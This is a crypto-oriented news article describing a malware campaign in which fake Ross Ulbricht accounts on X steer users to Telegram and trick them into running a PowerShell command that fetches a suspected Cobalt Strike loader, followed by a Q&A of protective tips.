Fake Ross Ulbricht Accounts Used in New Malware Campaign

Can a Silk Road founder’s pardon lead to your computer’s demise? Fake accounts impersonating Ross Ulbricht, the notorious Silk Road founder who was recently pardoned by former President Donald Trump, have surfaced on X, leading users into a sophisticated malware trap.

• Fake Ross Ulbricht accounts on X lead to malware via Telegram
• PowerShell scripts download harmful ZIP files
• Cybercriminals exploit Ulbricht’s high-profile release

Ross Ulbricht, once sentenced to life in prison for creating the Silk Road—a darknet marketplace that thrived on anonymity and illegal trade—was pardoned and released on January 22, 2025. This event, celebrated within the crypto and darknet communities, quickly became a tool for deception by cybercriminals. Fake verified accounts on X, pretending to be Ulbricht, are directing users to Telegram channels where they are prompted to undergo a fake “Safeguard” identity verification process.

This verification process is a scam designed to trick users into running a PowerShell command. PowerShell, a task automation and configuration management framework from Microsoft, allows users to control and automate the administration of Windows operating systems and applications. When users run the command, it triggers the download of a ZIP file from the domain http://openline[.]cyou. Inside this seemingly harmless file lurks potential malware, including a suspected Cobalt Strike loader. A Cobalt Strike loader is a tool that can enable remote access and facilitate malicious activities like ransomware and data theft.

The campaign uses a variation of the “Click-Fix” tactic, a deceptive method that tricks users into thinking they’re completing a captcha or verification process. In simple terms, the “Click-Fix” tactic involves convincing users to click on something that appears to fix or verify an issue, but instead, it leads to malware installation. It’s a stark reminder of how swiftly cybercriminals can exploit high-profile news for deceitful purposes.

For those unfamiliar, the Silk Road was Ulbricht’s brainchild—a platform on the dark web where users could buy and sell everything from narcotics to stolen data using bitcoin, showcasing the darker side of cryptocurrency’s potential for anonymity. The darknet is a hidden part of the internet accessible only through special software, allowing users to maintain their anonymity. The platform’s closure following Ulbricht’s arrest in 2013 did not end the fascination with such marketplaces, and Ulbricht’s release has reignited debates about privacy, technology, and the ethics of darknet operations.

This latest malware campaign underscores the necessity for vigilance in the crypto space, where news can be as unpredictable as the market itself. It’s a sobering reminder that while we advocate for the ideals of decentralization, privacy, and disrupting the status quo, the same tools that empower us can be weaponized against us. Yet, amidst the gloom, there’s a glimmer of hope. The very technology that enables these scams also empowers communities to fight back. From decentralized security solutions to the tireless efforts of cybersecurity researchers, such as those at vx-underground, the crypto community is well-equipped to combat these threats. While we must remain critical of the inherent risks, we can’t overlook the potential for good that these technologies offer.

As we navigate this complex landscape, let’s keep our wits sharp and our software updated. In a world where even a Silk Road founder’s pardon can be turned into a cyber weapon, staying ahead of the game isn’t just smart—it’s essential. The crypto community’s resilience offers hope while we must remain vigilant, reminding us that the fight for a secure and decentralized future is ongoing.

Key Takeaways and Questions

• What is the purpose of the fake Ross Ulbricht accounts?

  The purpose is to capitalize on the news of Ulbricht’s release, luring users into a malware campaign.

• How does the malware campaign operate?

  It redirects users from X to Telegram, where they’re tricked into running a PowerShell script that downloads and installs malware, potentially including a Cobalt Strike loader.

• What is the significance of Ross Ulbricht’s pardon in relation to this campaign?

  The pardon and release of Ulbricht provided a timely news hook that cybercriminals exploited to deceive users, leveraging the high-profile nature of the event.

• What risks do users face if they fall for this scam?

  Users risk infecting their devices with malware, which could lead to remote access by attackers, data theft, or ransomware attacks.

• What can users do to protect themselves from such campaigns?

  Users should be cautious of clicking on links from unfamiliar sources, especially those related to high-profile news, and should avoid running unknown scripts or commands on their devices. Utilizing specialized security software can provide additional protection.

“Exploiting the news surrounding him, threat actors on X are redirecting users to a Telegram channel where they are duped into running PowerShell scripts that infect their devices with malware.”

“This development comes after Ulbricht was pardoned and released this week after being imprisoned since 2013 for founding and operating the infamous dark web marketplace Silk Road.”

The crypto community’s response to such scams is a testament to the resilience and adaptability of decentralized systems. While we remain vigilant, the principles of decentralization and privacy that we champion are also our greatest assets in the ongoing battle against cyber threats.